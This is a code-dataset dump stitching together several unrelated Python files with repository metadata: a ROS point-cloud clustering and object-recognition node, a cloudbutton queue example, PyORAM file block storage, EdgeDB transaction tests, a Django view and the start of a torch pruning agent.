# TODO: ROS node initialization
rospy.init_node('clustering', anonymous=True)
# TODO: Create Subscribers
pcl_sub = rospy.Subscriber("/sensor_stick/point_cloud", pc2.PointCloud2, pcl_callback, queue_size=1)
# TODO: Create Publishers
pcl_objects_pub = rospy.Publisher("/pcl_objects", PointCloud2, queue_size=1)
pcl_table_pub = rospy.Publisher("/pcl_table", PointCloud2, queue_size=1)
pcl_cluster_pub = rospy.Publisher("pcl_cluster", PointCloud2, queue_size=1)
# Create Publishers
# TODO: here you need to create two publishers
# Call them object_markers_pub and detected_objects_pub
# Have them publish to "/object_markers" and "/detected_objects" with
# Message Types "Marker" and "DetectedObjectsArray" , respectively
object_markers_pub = rospy.Publisher("/object_markers", Marker, queue_size=1)
detected_objects_pub = rospy.Publisher("/detected_objects", DetectedObjectsArray, queue_size=1)
# TODO: Load Model From disk
model = pickle.load(open('model.sav', 'rb'))
clf = model['classifier']
encoder = LabelEncoder()
encoder.classes_ = model['classes']
scaler = model['scaler']
# Initialize color_list
get_color_list.color_list = []
# TODO: Spin while node is not shutdown
while not rospy.is_shutdown():
rospy.spin()
| 37.834081
| 106
| 0.733555
|
#!/usr/bin/env python
import numpy as np
import sklearn
from sklearn.preprocessing import LabelEncoder
import pickle
from sensor_stick.srv import GetNormals
from sensor_stick.features import compute_color_histograms
from sensor_stick.features import compute_normal_histograms
from visualization_msgs.msg import Marker
from sensor_stick.marker_tools import *
from sensor_stick.msg import DetectedObjectsArray
from sensor_stick.msg import DetectedObject
from sensor_stick.pcl_helper import *
def get_normals(cloud):
get_normals_prox = rospy.ServiceProxy('/feature_extractor/get_normals', GetNormals)
return get_normals_prox(cloud).cluster
# Voxel Grid filter
def voxel_grid_downssampling(pcl_data, leaf_size):
# Create a VoxelGrid filter object for our input point cloud
vox = pcl_data.make_voxel_grid_filter()
# Set the voxel (or leaf) size
vox.set_leaf_size(leaf_size, leaf_size, leaf_size)
return vox.filter()
# PassThrough filter
def passthrough(pcl_data, filter_axis, axis_min, axis_max):
# Create a PassThrough filter object.
passthrough = pcl_data.make_passthrough_filter()
passthrough.set_filter_field_name(filter_axis)
passthrough.set_filter_limits(axis_min, axis_max)
return passthrough.filter()
# RANSAC plane segmentation
def ransac_plane_segmentation(pcl_data, pcl_sac_model_plane, pcl_sac_ransac, max_distance):
# Create the segmentation object
seg = pcl_data.make_segmenter()
# Set the model you wish to fit
seg.set_model_type(pcl_sac_model_plane)
seg.set_method_type(pcl_sac_ransac)
seg.set_distance_threshold(max_distance)
return seg
# Extract inliers/outliers
def extract_cloud_objects_and_cloud_table(pcl_data, ransac_segmentation):
inliers, coefficients = ransac_segmentation.segment()
cloud_table = pcl_data.extract(inliers, negative=False)
cloud_objects = pcl_data.extract(inliers, negative=True)
return cloud_table,cloud_objects
# Outlier Removal Filter
def statistical_outlier_filtering(pcl_data, mean_k, tresh):
outlier_filter = pcl_data.make_statistical_outlier_filter()
outlier_filter.set_mean_k(mean_k)
outlier_filter.set_std_dev_mul_thresh(tresh)
return outlier_filter.filter()
# Euclidean Clustering (perform a DBSCAN cluster search)
def euclidean_clustering(white_cloud):
tree = white_cloud.make_kdtree()
# Create Cluster-Mask Point Cloud to visualize each cluster separately
ec = white_cloud.make_EuclideanClusterExtraction()
# Set tolerances for distance threshold
# as well as minimum and maximum cluster size (in points)
ec.set_ClusterTolerance(0.03)
ec.set_MinClusterSize(100)
ec.set_MaxClusterSize(10000)
# Search the k-d tree for clusters
ec.set_SearchMethod(tree)
# Extract indices for each of the discovered clusters
cluster_indices = ec.Extract()
# now contains a list of indices for each cluster (a list of lists). In the next step,
# you'll create a new point cloud
# to visualize the clusters by assigning a color to each of them.
#Assign a color corresponding to each segmented object in scene
cluster_color = get_color_list(len(cluster_indices))
color_cluster_point_list = []
for j, indices in enumerate(cluster_indices):
for i, indice in enumerate(indices):
color_cluster_point_list.append([white_cloud[indice][0],
white_cloud[indice][1],
white_cloud[indice][2],
rgb_to_float(cluster_color[j])])
#Create new cloud containing all clusters, each with unique color
cluster_cloud = pcl.PointCloud_PointXYZRGB()
cluster_cloud.from_list(color_cluster_point_list)
return cluster_cloud,cluster_indices
# Callback function for your Point Cloud Subscriber
def pcl_callback(pcl_msg):
# Exercise-2 TODOs:
# TODO: Convert ROS msg to PCL data
cloud = ros_to_pcl(pcl_msg)
cloud = statistical_outlier_filtering(cloud, 10, 0.001)
# TODO: Voxel Grid Downsampling
LEAF_SIZE = 0.01
cloud = voxel_grid_downssampling(cloud, LEAF_SIZE)
# TODO: PassThrough Filter
filter_axis ='z'
axis_min = 0.50
axis_max = 0.90
cloud = passthrough(cloud, filter_axis, axis_min, axis_max)
filter_axis = 'x'
axis_min = 0.30
axis_max = 1.0
cloud = passthrough(cloud, filter_axis, axis_min, axis_max)
# TODO: RANSAC Plane Segmentation
ransac_segmentation = ransac_plane_segmentation(cloud, pcl.SACMODEL_PLANE, pcl.SAC_RANSAC, 0.01)
# TODO: Extract inliers and outliers
cloud_table, cloud_objects = extract_cloud_objects_and_cloud_table(cloud, ransac_segmentation)
# TODO: Euclidean Clustering
white_cloud = XYZRGB_to_XYZ(cloud_objects)
cluster_cloud,cluster_indices = euclidean_clustering(white_cloud)
# TODO: Create Cluster-Mask Point Cloud to visualize each cluster separately
# TODO: Convert PCL data to ROS messages
ros_cluster_cloud = pcl_to_ros(cluster_cloud)
ros_cloud_objects = pcl_to_ros(cloud_objects)
ros_cloud_table = pcl_to_ros(cloud_table)
# TODO: Publish ROS messages
pcl_objects_pub.publish(ros_cloud_objects)
pcl_table_pub.publish(ros_cloud_table)
pcl_cluster_pub.publish(ros_cluster_cloud)
# Exercise-3 TODOs:
# Classify the clusters! (loop through each detected cluster one at a time)
detected_objects_labels = []
detected_objects = []
# write a for loop to cycle through each of the segmented clusters
for index, pts_list in enumerate(cluster_indices):
# Grab the points for the cluster
pcl_cluster = cloud_objects.extract(pts_list)
# TODO: convert the cluster from pcl to ROS using helper function
ros_cluster = pcl_to_ros(pcl_cluster)
# Compute the associated feature vector
# Extract histogram features
chists = compute_color_histograms(ros_cluster, using_hsv=True)
normals = get_normals(ros_cluster)
nhists = compute_normal_histograms(normals)
feature = np.concatenate((chists, nhists))
# Make the prediction, retrieve the label for the result
# and add it to detected_objects_labels list
prediction = clf.predict(scaler.transform(feature.reshape(1, -1)))
label = encoder.inverse_transform(prediction)[0]
detected_objects_labels.append(label)
# Publish a label into RViz
label_pos = list(white_cloud[pts_list[0]])
label_pos[2] += .4
object_markers_pub.publish(make_label(label,label_pos, index))
# Add the detected object to the list of detected objects.
do = DetectedObject()
do.label = label
do.cloud = ros_cluster
detected_objects.append(do)
rospy.loginfo('Detected {} objects: {}'.format(len(detected_objects_labels), detected_objects_labels))
# Publish the list of detected objects
# This is the output you'll need to complete the upcoming project!
detected_objects_pub.publish(detected_objects)
if __name__ == '__main__':
# TODO: ROS node initialization
rospy.init_node('clustering', anonymous=True)
# TODO: Create Subscribers
pcl_sub = rospy.Subscriber("/sensor_stick/point_cloud", pc2.PointCloud2, pcl_callback, queue_size=1)
# TODO: Create Publishers
pcl_objects_pub = rospy.Publisher("/pcl_objects", PointCloud2, queue_size=1)
pcl_table_pub = rospy.Publisher("/pcl_table", PointCloud2, queue_size=1)
pcl_cluster_pub = rospy.Publisher("pcl_cluster", PointCloud2, queue_size=1)
# Create Publishers
# TODO: here you need to create two publishers
# Call them object_markers_pub and detected_objects_pub
# Have them publish to "/object_markers" and "/detected_objects" with
# Message Types "Marker" and "DetectedObjectsArray" , respectively
object_markers_pub = rospy.Publisher("/object_markers", Marker, queue_size=1)
detected_objects_pub = rospy.Publisher("/detected_objects", DetectedObjectsArray, queue_size=1)
# TODO: Load Model From disk
model = pickle.load(open('model.sav', 'rb'))
clf = model['classifier']
encoder = LabelEncoder()
encoder.classes_ = model['classes']
scaler = model['scaler']
# Initialize color_list
get_color_list.color_list = []
# TODO: Spin while node is not shutdown
while not rospy.is_shutdown():
rospy.spin()
| 6,167
| 0
| 177
|
131e860e18ee61e01c595fad8941bfb4fb5deb07
| 546
|
py
|
Python
|
examples/joinable_queue.py
|
cloudbutton/cloudbutton
|
1062693a6767badc6369a026e2b8ad011f27efbb
|
[
"Apache-2.0"
] | 7
|
2020-05-28T11:54:12.000Z
|
2020-09-26T13:16:45.000Z
|
examples/joinable_queue.py
|
cloudbutton/cloudbutton
|
1062693a6767badc6369a026e2b8ad011f27efbb
|
[
"Apache-2.0"
] | 3
|
2020-06-18T14:07:27.000Z
|
2020-06-18T14:07:28.000Z
|
examples/joinable_queue.py
|
cloudbutton/cloudbutton
|
1062693a6767badc6369a026e2b8ad011f27efbb
|
[
"Apache-2.0"
] | 5
|
2020-04-29T09:29:52.000Z
|
2020-09-22T13:42:55.000Z
|
from cloudbutton.multiprocessing import Process, JoinableQueue
if __name__ == '__main__':
q = JoinableQueue()
p = Process(target=worker, args=(q,))
p.start()
for x in range(10):
q.put(x)
# uncomment to hang on the q.join
#q.put(11)
q.join()
q.put(-1) # end loop
p.join()
| 16.545455
| 62
| 0.532967
|
from cloudbutton.multiprocessing import Process, JoinableQueue
def worker(q):
working = True
while working:
x = q.get()
# Do work that may fail
assert x < 10
# Confirm task
q.task_done()
if x == -1:
working = False
if __name__ == '__main__':
q = JoinableQueue()
p = Process(target=worker, args=(q,))
p.start()
for x in range(10):
q.put(x)
# uncomment to hang on the q.join
#q.put(11)
q.join()
q.put(-1) # end loop
p.join()
| 201
| 0
| 23
|
04c390e7857fb3752b53b9c2903420309b83a2b5
| 12,045
|
py
|
Python
|
src/pyoram/storage/block_storage_file.py
|
ghackebeil/PyORAM
|
53e109dfb1ecec52348a70ddc64fae65eea7490a
|
[
"MIT"
] | 24
|
2016-04-14T14:27:37.000Z
|
2022-03-13T13:53:18.000Z
|
src/pyoram/storage/block_storage_file.py
|
ghackebeil/PyORAM
|
53e109dfb1ecec52348a70ddc64fae65eea7490a
|
[
"MIT"
] | 4
|
2016-03-14T04:40:23.000Z
|
2016-06-01T04:37:18.000Z
|
src/pyoram/storage/block_storage_file.py
|
ghackebeil/PyORAM
|
53e109dfb1ecec52348a70ddc64fae65eea7490a
|
[
"MIT"
] | 4
|
2016-03-16T23:53:24.000Z
|
2020-05-27T19:27:37.000Z
|
__all__ = ('BlockStorageFile',)
import os
import struct
import logging
import errno
from multiprocessing.pool import ThreadPool
import pyoram
from pyoram.storage.block_storage import \
(BlockStorageInterface,
BlockStorageTypeFactory)
import tqdm
import six
from six.moves import xrange
log = logging.getLogger("pyoram")
class BlockStorageFile(BlockStorageInterface):
"""
A class implementing the block storage interface
using a local file.
"""
_index_struct_string = "!LLL?"
_index_offset = struct.calcsize(_index_struct_string)
# This method is usually executed in another thread, so
# do not attempt to handle exceptions because it will
# not work.
#
# Define BlockStorageInterface Methods
#
@classmethod
@classmethod
@property
@property
@property
@property
@property
@property
BlockStorageTypeFactory.register_device("file", BlockStorageFile)
| 35.955224
| 92
| 0.532337
|
__all__ = ('BlockStorageFile',)
import os
import struct
import logging
import errno
from multiprocessing.pool import ThreadPool
import pyoram
from pyoram.storage.block_storage import \
(BlockStorageInterface,
BlockStorageTypeFactory)
import tqdm
import six
from six.moves import xrange
log = logging.getLogger("pyoram")
class default_filesystem(object):
open = open
remove = os.remove
stat = os.stat
class BlockStorageFile(BlockStorageInterface):
"""
A class implementing the block storage interface
using a local file.
"""
_index_struct_string = "!LLL?"
_index_offset = struct.calcsize(_index_struct_string)
def __init__(self,
storage_name,
threadpool_size=None,
ignore_lock=False,
_filesystem=default_filesystem):
self._bytes_sent = 0
self._bytes_received = 0
self._filesystem = _filesystem
self._ignore_lock = ignore_lock
self._f = None
self._pool = None
self._close_pool = True
self._async_write = None
self._storage_name = storage_name
self._f = self._filesystem.open(self.storage_name, "r+b")
self._f.seek(0)
self._block_size, self._block_count, user_header_size, locked = \
struct.unpack(
BlockStorageFile._index_struct_string,
self._f.read(BlockStorageFile._index_offset))
if locked and (not self._ignore_lock):
self._f.close()
self._f = None
raise IOError(
"Can not open block storage device because it is "
"locked by another process. To ignore this check, "
"initialize this class with the keyword 'ignore_lock' "
"set to True.")
self._user_header_data = bytes()
if user_header_size > 0:
self._user_header_data = \
self._f.read(user_header_size)
self._header_offset = BlockStorageFile._index_offset + \
len(self._user_header_data)
# TODO: Figure out why this is required for Python3
# in order to prevent issues with the
# TopCachedEncryptedHeapStorage class. The
# problem has something to do with bufferedio,
# but it makes no sense why this fixes it (all
# we've done is read above these lines). As
# part of this, investigate whethor or not we
# need the call to flush after write_block(s),
# or if its simply connected to some Python3
# bug in bufferedio.
self._f.flush()
if not self._ignore_lock:
# turn on the locked flag
self._f.seek(0)
self._f.write(
struct.pack(BlockStorageFile._index_struct_string,
self.block_size,
self.block_count,
len(self._user_header_data),
True))
self._f.flush()
if threadpool_size != 0:
self._pool = ThreadPool(threadpool_size)
def _check_async(self):
if self._async_write is not None:
self._async_write.get()
self._async_write = None
# TODO: Figure out why tests fail on Python3 without this
if six.PY3:
if self._f is None:
return
self._f.flush()
def _schedule_async_write(self, args, callback=None):
assert self._async_write is None
if self._pool is not None:
self._async_write = \
self._pool.apply_async(self._writev, (args, callback))
else:
self._writev(args, callback)
# This method is usually executed in another thread, so
# do not attempt to handle exceptions because it will
# not work.
def _writev(self, chunks, callback):
for i, block in chunks:
self._f.seek(self._header_offset + i * self.block_size)
self._f.write(block)
if callback is not None:
callback(i)
def _prep_for_close(self):
self._check_async()
if self._close_pool and (self._pool is not None):
self._pool.close()
self._pool.join()
self._pool = None
if self._f is not None:
if not self._ignore_lock:
# turn off the locked flag
self._f.seek(0)
self._f.write(
struct.pack(BlockStorageFile._index_struct_string,
self.block_size,
self.block_count,
len(self._user_header_data),
False))
self._f.flush()
#
# Define BlockStorageInterface Methods
#
def clone_device(self):
f = BlockStorageFile(self.storage_name,
threadpool_size=0,
ignore_lock=True)
f._pool = self._pool
f._close_pool = False
return f
@classmethod
def compute_storage_size(cls,
block_size,
block_count,
header_data=None,
ignore_header=False):
assert (block_size > 0) and (block_size == int(block_size))
assert (block_count > 0) and (block_count == int(block_count))
if header_data is None:
header_data = bytes()
if ignore_header:
return block_size * block_count
else:
return BlockStorageFile._index_offset + \
len(header_data) + \
block_size * block_count
@classmethod
def setup(cls,
storage_name,
block_size,
block_count,
initialize=None,
header_data=None,
ignore_existing=False,
threadpool_size=None,
_filesystem=default_filesystem):
if (not ignore_existing):
_exists = True
try:
_filesystem.stat(storage_name)
except OSError as e:
if e.errno == errno.ENOENT:
_exists = False
if _exists:
raise IOError(
"Storage location already exists: %s"
% (storage_name))
if (block_size <= 0) or (block_size != int(block_size)):
raise ValueError(
"Block size (bytes) must be a positive integer: %s"
% (block_size))
if (block_count <= 0) or (block_count != int(block_count)):
raise ValueError(
"Block count must be a positive integer: %s"
% (block_count))
if (header_data is not None) and \
(type(header_data) is not bytes):
raise TypeError(
"'header_data' must be of type bytes. "
"Invalid type: %s" % (type(header_data)))
if initialize is None:
zeros = bytes(bytearray(block_size))
initialize = lambda i: zeros
try:
with _filesystem.open(storage_name, "wb") as f:
# create_index
if header_data is None:
f.write(struct.pack(BlockStorageFile._index_struct_string,
block_size,
block_count,
0,
False))
else:
f.write(struct.pack(BlockStorageFile._index_struct_string,
block_size,
block_count,
len(header_data),
False))
f.write(header_data)
with tqdm.tqdm(total=block_count*block_size,
desc="Initializing File Block Storage Space",
unit="B",
unit_scale=True,
disable=not pyoram.config.SHOW_PROGRESS_BAR) as progress_bar:
for i in xrange(block_count):
block = initialize(i)
assert len(block) == block_size, \
("%s != %s" % (len(block), block_size))
f.write(block)
progress_bar.update(n=block_size)
except: # pragma: no cover
_filesystem.remove(storage_name) # pragma: no cover
raise # pragma: no cover
return BlockStorageFile(storage_name,
threadpool_size=threadpool_size,
_filesystem=_filesystem)
@property
def header_data(self):
return self._user_header_data
@property
def block_count(self):
return self._block_count
@property
def block_size(self):
return self._block_size
@property
def storage_name(self):
return self._storage_name
def update_header_data(self, new_header_data):
self._check_async()
if len(new_header_data) != len(self.header_data):
raise ValueError(
"The size of header data can not change.\n"
"Original bytes: %s\n"
"New bytes: %s" % (len(self.header_data),
len(new_header_data)))
self._user_header_data = bytes(new_header_data)
self._f.seek(BlockStorageFile._index_offset)
self._f.write(self._user_header_data)
def close(self):
self._prep_for_close()
if self._f is not None:
try:
self._f.close()
except OSError: # pragma: no cover
pass # pragma: no cover
self._f = None
def read_blocks(self, indices):
self._check_async()
blocks = []
for i in indices:
assert 0 <= i < self.block_count
self._bytes_received += self.block_size
self._f.seek(self._header_offset + i * self.block_size)
blocks.append(self._f.read(self.block_size))
return blocks
def yield_blocks(self, indices):
self._check_async()
for i in indices:
assert 0 <= i < self.block_count
self._bytes_received += self.block_size
self._f.seek(self._header_offset + i * self.block_size)
yield self._f.read(self.block_size)
def read_block(self, i):
self._check_async()
assert 0 <= i < self.block_count
self._bytes_received += self.block_size
self._f.seek(self._header_offset + i * self.block_size)
return self._f.read(self.block_size)
def write_blocks(self, indices, blocks, callback=None):
self._check_async()
chunks = []
for i, block in zip(indices, blocks):
assert 0 <= i < self.block_count
assert len(block) == self.block_size, \
("%s != %s" % (len(block), self.block_size))
self._bytes_sent += self.block_size
chunks.append((i, block))
self._schedule_async_write(chunks, callback=callback)
def write_block(self, i, block):
self._check_async()
assert 0 <= i < self.block_count
assert len(block) == self.block_size
self._bytes_sent += self.block_size
self._schedule_async_write(((i, block),))
@property
def bytes_sent(self):
return self._bytes_sent
@property
def bytes_received(self):
return self._bytes_received
BlockStorageTypeFactory.register_device("file", BlockStorageFile)
| 10,442
| 70
| 581
|
81fad6a313131369b06b9a12a0f5f95247a51169
| 951
|
py
|
Python
|
goutham_assignment/Company/views.py
|
xWaterBottlex/kutumb-assignment
|
c5deb51342394dc7e2c996a24cdf5e2662ded796
|
[
"MIT"
] | null | null | null |
goutham_assignment/Company/views.py
|
xWaterBottlex/kutumb-assignment
|
c5deb51342394dc7e2c996a24cdf5e2662ded796
|
[
"MIT"
] | 3
|
2021-06-08T21:41:51.000Z
|
2022-01-13T02:49:13.000Z
|
goutham_assignment/Company/views.py
|
GouthamDoddi/kutumb-assignment
|
c5deb51342394dc7e2c996a24cdf5e2662ded796
|
[
"MIT"
] | null | null | null |
from django.contrib.auth.mixins import LoginRequiredMixin
from django.apps import apps
from django.views.generic import DetailView, CreateView
from django.http import HttpResponse, HttpRequest, request
from django.core.signals import request_finished
from django.dispatch import receiver
Company = apps.get_model('Company', 'Company')
| 28.818182
| 58
| 0.660358
|
from django.contrib.auth.mixins import LoginRequiredMixin
from django.apps import apps
from django.views.generic import DetailView, CreateView
from django.http import HttpResponse, HttpRequest, request
from django.core.signals import request_finished
from django.dispatch import receiver
Company = apps.get_model('Company', 'Company')
class PostDetailView(DetailView):
model = Company
def get_object(self, *args, **kwargs):
obj = super().get_object()
try:
self.request.session['viewed']
except KeyError:
self.request.session['viewed'] = False
else:
pass
while not self.request.session['viewed']:
obj.total_viewers += 1
obj.save()
self.request.session['viewed'] = True
return obj
return obj
class PostCreateView(LoginRequiredMixin, CreateView):
model = Company
fields = ['name', 'logo', 'address']
| 415
| 152
| 46
|
c54051df8e2aea44fdfe329ae2ee54ce18aa91a8
| 2,223
|
py
|
Python
|
generate_payout_data_script.py
|
dwhalen/holophrasm
|
0d971428f9879ad3d6c0a781f1a021cff73fb1ce
|
[
"MIT"
] | 33
|
2016-09-23T15:05:24.000Z
|
2021-08-30T11:13:35.000Z
|
generate_payout_data_script.py
|
dwhalen/holophrasm
|
0d971428f9879ad3d6c0a781f1a021cff73fb1ce
|
[
"MIT"
] | 4
|
2016-12-14T03:41:55.000Z
|
2020-05-27T20:27:55.000Z
|
generate_payout_data_script.py
|
dwhalen/holophrasm
|
0d971428f9879ad3d6c0a781f1a021cff73fb1ce
|
[
"MIT"
] | 12
|
2016-08-20T10:40:21.000Z
|
2022-01-03T09:47:01.000Z
|
import time
from tree_parser import *
from data_utils5 import *
import os
import withpool
text = file_contents()
database = meta_math_database(text,n=None, remember_proof_steps=True)
print()
lm = LanguageModel(database)
saved_interface = None
# import
import build_payout_data_set as pd
pd.initialize_interface(lm, 'searcher')
valp = lm.validation_propositions
testp = lm.test_propositions
trainp = lm.training_propositions
chunk_size = len(trainp)//8
chunks = [
valp,
testp,
trainp[:chunk_size],
trainp[chunk_size:2*chunk_size],
trainp[2*chunk_size:3*chunk_size],
trainp[3*chunk_size:4*chunk_size],
trainp[4*chunk_size:5*chunk_size],
trainp[5*chunk_size:6*chunk_size],
trainp[6*chunk_size:7*chunk_size],
trainp[7*chunk_size:]
]
for i, chunk in enumerate(chunks):
filename = 'payout_data_'+str(i)
if os.path.exists(filename):
continue
# okay. we're doing this one.
# claim it.
with open(filename, 'wb') as handle:
pickle.dump(None, handle)
# do the stuff.
print('generating chunk: '+filename)
with withpool.Pool(None) as pool:
allpds = pool.map(process_chunk, [(i,j) for j in range(len(chunk))], chunksize=1)
print('saving '+filename)
with open(filename, 'wb') as handle:
pickle.dump(allpds, handle)
#
# def validation_data(n):
# print 'starting item',n
# return pd.PropositionsData(valp[n])
''' let's do this in chunks
import withpool
with withpool.Pool(8) as pool:
start = time.time()
allpds = {}
allpds['validation'] = pool.map(validation_data, range(len(valp)), chunksize=1)
print (time.time()-start), (time.time()-start)/len(valp)
allpds['test'] = pool.map(test_data, range(len(testp)), chunksize=1)
print (time.time()-start), (time.time()-start)/(len(valp)+len(testp))
allpds['training'] = pool.map(training_data, range(len(trainp)), chunksize=1)
print (time.time()-start), (time.time()-start)/(len(valp)+len(testp)+len(trainp))
print 'saving database'
import pickle
with open('payout_data','wb') as handle:
pickle.dump(allpds, handle)
'''
| 24.977528
| 89
| 0.689159
|
import time
from tree_parser import *
from data_utils5 import *
import os
import withpool
text = file_contents()
database = meta_math_database(text,n=None, remember_proof_steps=True)
print()
lm = LanguageModel(database)
saved_interface = None
# import
import build_payout_data_set as pd
pd.initialize_interface(lm, 'searcher')
valp = lm.validation_propositions
testp = lm.test_propositions
trainp = lm.training_propositions
chunk_size = len(trainp)//8
chunks = [
valp,
testp,
trainp[:chunk_size],
trainp[chunk_size:2*chunk_size],
trainp[2*chunk_size:3*chunk_size],
trainp[3*chunk_size:4*chunk_size],
trainp[4*chunk_size:5*chunk_size],
trainp[5*chunk_size:6*chunk_size],
trainp[6*chunk_size:7*chunk_size],
trainp[7*chunk_size:]
]
def process_chunk(x):
i,j = x
print('on chunk', i, 'item', j, '/', len(chunks[i]))
return pd.PropositionsData(chunks[i][j])
for i, chunk in enumerate(chunks):
filename = 'payout_data_'+str(i)
if os.path.exists(filename):
continue
# okay. we're doing this one.
# claim it.
with open(filename, 'wb') as handle:
pickle.dump(None, handle)
# do the stuff.
print('generating chunk: '+filename)
with withpool.Pool(None) as pool:
allpds = pool.map(process_chunk, [(i,j) for j in range(len(chunk))], chunksize=1)
print('saving '+filename)
with open(filename, 'wb') as handle:
pickle.dump(allpds, handle)
#
# def validation_data(n):
# print 'starting item',n
# return pd.PropositionsData(valp[n])
''' let's do this in chunks
import withpool
with withpool.Pool(8) as pool:
start = time.time()
allpds = {}
allpds['validation'] = pool.map(validation_data, range(len(valp)), chunksize=1)
print (time.time()-start), (time.time()-start)/len(valp)
allpds['test'] = pool.map(test_data, range(len(testp)), chunksize=1)
print (time.time()-start), (time.time()-start)/(len(valp)+len(testp))
allpds['training'] = pool.map(training_data, range(len(trainp)), chunksize=1)
print (time.time()-start), (time.time()-start)/(len(valp)+len(testp)+len(trainp))
print 'saving database'
import pickle
with open('payout_data','wb') as handle:
pickle.dump(allpds, handle)
'''
| 114
| 0
| 23
|
8a1bf4a8337112febfa3b668351586f40df2a744
| 6,427
|
py
|
Python
|
tests/test_sync_tx_legacy.py
|
fantix/edgedb-python
|
2d8deaec503a206555f97f3f71952462e3483629
|
[
"Apache-2.0"
] | null | null | null |
tests/test_sync_tx_legacy.py
|
fantix/edgedb-python
|
2d8deaec503a206555f97f3f71952462e3483629
|
[
"Apache-2.0"
] | null | null | null |
tests/test_sync_tx_legacy.py
|
fantix/edgedb-python
|
2d8deaec503a206555f97f3f71952462e3483629
|
[
"Apache-2.0"
] | null | null | null |
#
# This source file is part of the EdgeDB open source project.
#
# Copyright 2016-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import edgedb
from edgedb import _testbase as tb
| 32.135
| 77
| 0.525751
|
#
# This source file is part of the EdgeDB open source project.
#
# Copyright 2016-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import edgedb
from edgedb import _testbase as tb
class TestSyncTxLegacy(tb.SyncQueryTestCase):
ISOLATED_METHODS = False
SETUP = '''
CREATE TYPE test::TransactionTest EXTENDING std::Object {
CREATE PROPERTY name -> std::str;
};
'''
TEARDOWN = '''
DROP TYPE test::TransactionTest;
'''
def test_sync_transaction_regular_01(self):
self.assertIsNone(self.con._top_xact)
tr = self.con.transaction()
self.assertIsNone(self.con._top_xact)
with self.assertRaises(ZeroDivisionError):
with tr as with_tr:
self.assertIs(self.con._top_xact, tr)
# We don't return the transaction object from __aenter__,
# to make it harder for people to use '.rollback()' and
# '.commit()' from within an 'with' block.
self.assertIsNone(with_tr)
self.con.execute('''
INSERT test::TransactionTest {
name := 'Test Transaction'
};
''')
1 / 0
self.assertIsNone(self.con._top_xact)
result = self.con.query('''
SELECT
test::TransactionTest
FILTER
test::TransactionTest.name = 'Test Transaction';
''')
self.assertEqual(result, [])
def test_sync_transaction_nested_01(self):
self.assertIsNone(self.con._top_xact)
tr = self.con.transaction()
self.assertIsNone(self.con._top_xact)
with self.assertRaises(ZeroDivisionError):
with tr:
self.assertIs(self.con._top_xact, tr)
with self.con.transaction():
self.assertIs(self.con._top_xact, tr)
self.con.execute('''
INSERT test::TransactionTest {
name := 'TXTEST 1'
};
''')
self.assertIs(self.con._top_xact, tr)
with self.assertRaises(ZeroDivisionError):
in_tr = self.con.transaction()
with in_tr:
self.assertIs(self.con._top_xact, tr)
self.con.query('''
INSERT test::TransactionTest {
name := 'TXTEST 2'
};
''')
1 / 0
recs = self.con.query('''
SELECT
test::TransactionTest {
name
}
FILTER
test::TransactionTest.name LIKE 'TXTEST%';
''')
self.assertEqual(len(recs), 1)
self.assertEqual(recs[0].name, 'TXTEST 1')
self.assertIs(self.con._top_xact, tr)
1 / 0
self.assertIs(self.con._top_xact, None)
recs = self.con.query('''
SELECT
test::TransactionTest {
name
}
FILTER
test::TransactionTest.name LIKE 'TXTEST%';
''')
self.assertEqual(len(recs), 0)
def test_sync_transaction_nested_02(self):
with self.con.transaction(isolation='repeatable_read'):
with self.con.transaction(): # no explicit isolation, OK
pass
with self.assertRaisesRegex(edgedb.InterfaceError,
r'different isolation'):
with self.con.transaction(isolation='repeatable_read'):
with self.con.transaction(isolation='serializable'):
pass
with self.assertRaisesRegex(edgedb.InterfaceError,
r'different read-write'):
with self.con.transaction():
with self.con.transaction(readonly=True):
pass
with self.assertRaisesRegex(edgedb.InterfaceError,
r'different deferrable'):
with self.con.transaction(deferrable=True):
with self.con.transaction(deferrable=False):
pass
def test_sync_transaction_interface_errors(self):
self.assertIsNone(self.con._top_xact)
tr = self.con.transaction()
with self.assertRaisesRegex(edgedb.InterfaceError,
r'cannot start; .* already started'):
with tr:
tr.start()
self.assertTrue(repr(tr).startswith(
'<edgedb.Transaction state:rolledback'))
self.assertIsNone(self.con._top_xact)
with self.assertRaisesRegex(edgedb.InterfaceError,
r'cannot start; .* already rolled back'):
with tr:
pass
self.assertIsNone(self.con._top_xact)
tr = self.con.transaction()
with self.assertRaisesRegex(edgedb.InterfaceError,
r'cannot manually commit.*with'):
with tr:
tr.commit()
self.assertIsNone(self.con._top_xact)
tr = self.con.transaction()
with self.assertRaisesRegex(edgedb.InterfaceError,
r'cannot manually rollback.*with'):
with tr:
tr.rollback()
self.assertIsNone(self.con._top_xact)
tr = self.con.transaction()
with self.assertRaisesRegex(edgedb.InterfaceError,
r'cannot enter context:.*with'):
with tr:
with tr:
pass
| 5,293
| 379
| 23
|
a76c710880e5cbafaca952cb802c9f15bd1e9aa8
| 4,297
|
py
|
Python
|
condense/torch/agent.py
|
SirBubbls/condense
|
e28f008477fe75c24b43cc853b2dc6d923f01813
|
[
"MIT"
] | null | null | null |
condense/torch/agent.py
|
SirBubbls/condense
|
e28f008477fe75c24b43cc853b2dc6d923f01813
|
[
"MIT"
] | null | null | null |
condense/torch/agent.py
|
SirBubbls/condense
|
e28f008477fe75c24b43cc853b2dc6d923f01813
|
[
"MIT"
] | null | null | null |
"""This file contains the implementation for basic pruning operations on arbitrary torch modules."""
import torch
import torch.nn as nn
import copy
from condense.optimizer.sparsity_functions import Constant
def calc_parameter_sparsity(p):
"""Calculates the sparsity percentage of a torch parameter.
Args:
p: torch parameter
Returns: sparsity percentage (as float) with range [0.0, 1.0]
"""
x = torch.sum((torch.flatten(p) == 0).float())
return float(x) / p.numel()
def masking_fn(X, t_sparsity):
"""Default masking function used by the PruningAgent."""
